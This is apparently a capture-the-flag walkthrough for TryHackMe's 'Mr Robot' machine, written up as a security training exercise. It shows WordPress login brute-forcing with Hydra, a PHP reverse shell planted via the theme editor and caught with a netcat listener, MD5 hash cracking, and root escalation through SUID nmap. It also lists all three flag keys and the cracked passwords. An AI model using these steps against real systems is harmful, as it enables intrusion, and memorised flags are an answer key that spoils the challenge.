TryHackMe · Medium

Mr Robot CTF

Platform: TryHackMe

Difficulty: Medium

OS: Linux

Category: Web, WordPress, PrivEsc

Inspired by the TV show Mr. Robot. The machine runs a vulnerable WordPress installation. The attack chain involves discovering a wordlist from robots.txt, brute-forcing WordPress admin, uploading a PHP reverse shell, and escalating privileges via an SUID nmap binary.

nmap gobuster wpscan hydra php-reverse-shell john nmap --interactive

3 Keys to Find

Found in robots.txt — publicly accessible from the web server root

Found in /home/robot/ — requires cracking an MD5 hash to access as user robot

Found in /root/ — requires privilege escalation via SUID nmap

Phase 1 — Web Enumeration & Key 1

Nmap Scan

Basic service enumeration — only web ports open, SSH is filtered.

$ nmap -sV -p- 10.10.x.x
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
22/tcp filtered ssh

robots.txt — Key 1 Found

Always check robots.txt early — here it reveals the first key and a wordlist.

$ curl http://10.10.x.x/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

$ curl http://10.10.x.x/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

Key 1

073403c8a58a1f80d943455fb30724b9

Download Wordlist & Deduplicate

$ wget http://10.10.x.x/fsocity.dic
858160 entries downloaded

$ sort -u fsocity.dic > fsocity_unique.dic
11451 unique entries # reduced from 858k — speeds up brute force

Phase 2 — WordPress Exploitation & Shell

Identify WordPress & Enumerate

WPScan reveals WordPress installation. Brute-force the username first, then the password.

$ wpscan --url http://10.10.x.x -e u
[+] WordPress version 4.3.1 identified
[+] No users found via API, trying login bruteforce...

# Brute force username with fsocity.dic
$ hydra -L fsocity_unique.dic -p test 10.10.x.x \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
[80][http-post-form] login: elliot

# Now brute force password for user elliot
$ hydra -l elliot -P fsocity_unique.dic 10.10.x.x \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:ERROR"
[80][http-post-form] login: elliot password: ER28-0652

PHP Reverse Shell via Theme Editor

With admin access, inject a PHP reverse shell into the WordPress theme editor (Appearance → Editor → 404.php).

# 1. Login to WordPress admin panel
# 2. Appearance → Editor → 404.php → paste php-reverse-shell.php
# 3. Change IP/port in shell to your machine

# Start listener
$ nc -lvnp 4444

# Trigger shell by visiting the 404 template
$ curl http://10.10.x.x/wp-content/themes/twentyfifteen/404.php

connect to [10.10.14.x] from 10.10.x.x
$ id
uid=1(daemon) gid=1(daemon)

Phase 3 — Key 2 & Privilege Escalation

Key 2 — Crack MD5 Hash

Key-2 is readable only by user robot. But there's a password.raw-md5 file we can crack.

$ ls /home/robot/
key-2-of-3.txt password.raw-md5

$ cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

# Crack with john
$ john --format=raw-md5 hash.txt --wordlist=rockyou.txt
abcdefghijklmnopqrstuvwxyz (robot)

$ su robot # password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Key 2

822c73956184f694993bede3eb39f959

Root via SUID Nmap

Find SUID binaries. Nmap has SUID bit set — older versions have an interactive mode that spawns a shell.

robot@linux:~$ find / -perm -4000 -type f 2>/dev/null
/usr/local/bin/nmap # SUID bit set!

robot@linux:~$ nmap --interactive
nmap> !sh
sh-4.3# id
uid=1002(robot) gid=1002(robot) euid=0(root)

sh-4.3# cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Key 3 (root)

04787ddef27c3dee1ee161b21670b4e4

Key Takeaways

robots.txt can leak sensitive files — always check it during recon

WordPress theme editor = code execution if admin credentials are compromised

Weak passwords (alphabetical sequence) are easily cracked by rockyou.txt

SUID binaries are a common privesc vector — always run: find / -perm -4000 2>/dev/null

nmap --interactive is a classic GTFOBins technique for SUID nmap escalation